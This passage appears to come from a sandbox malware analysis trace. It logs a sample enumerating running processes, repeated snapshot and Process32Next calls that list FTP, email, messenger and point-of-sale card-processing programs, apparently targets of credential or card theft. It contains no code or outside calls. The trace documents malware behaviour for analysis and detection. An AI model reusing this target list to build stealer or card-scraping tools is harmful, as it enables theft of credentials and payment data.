th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0240.771] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0240.773] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0240.774] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0240.823] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0240.825] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0240.826] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0240.828] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0240.829] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0240.831] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0240.832] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0240.834] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0240.835] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0240.837] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0240.838] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0240.840] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0240.841] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0240.843] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0240.844] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0240.846] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0240.848] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0240.850] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0240.852] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0240.853] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0240.947] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0240.950] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0240.952] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0240.954] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0240.956] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0240.958] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0240.960] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0240.961] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0240.963] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0240.967] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0240.969] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0240.971] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0240.972] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0240.974] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0240.975] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0240.977] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0240.979] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0241.031] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0241.033] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0241.035] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0241.036] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0241.038] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0241.040] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0241.045] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0241.047] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0241.049] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0241.050] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0241.052] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0241.054] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0241.055] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0241.057] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0241.061] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0241.063] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0241.064] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0241.066] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0241.067] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0241.069] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0241.070] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0241.072] CloseHandle (hObject=0x1b08) returned 1 [0241.072] Sleep (dwMilliseconds=0x64) [0241.187] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b08 [0241.197] Process32First (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0241.202] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0241.203] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0241.205] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0241.206] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0241.207] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0241.209] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0241.210] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0241.212] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0241.213] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.215] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.219] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0241.220] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.221] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.223] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.224] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.226] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.227] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.228] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.260] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0241.262] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0241.263] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, 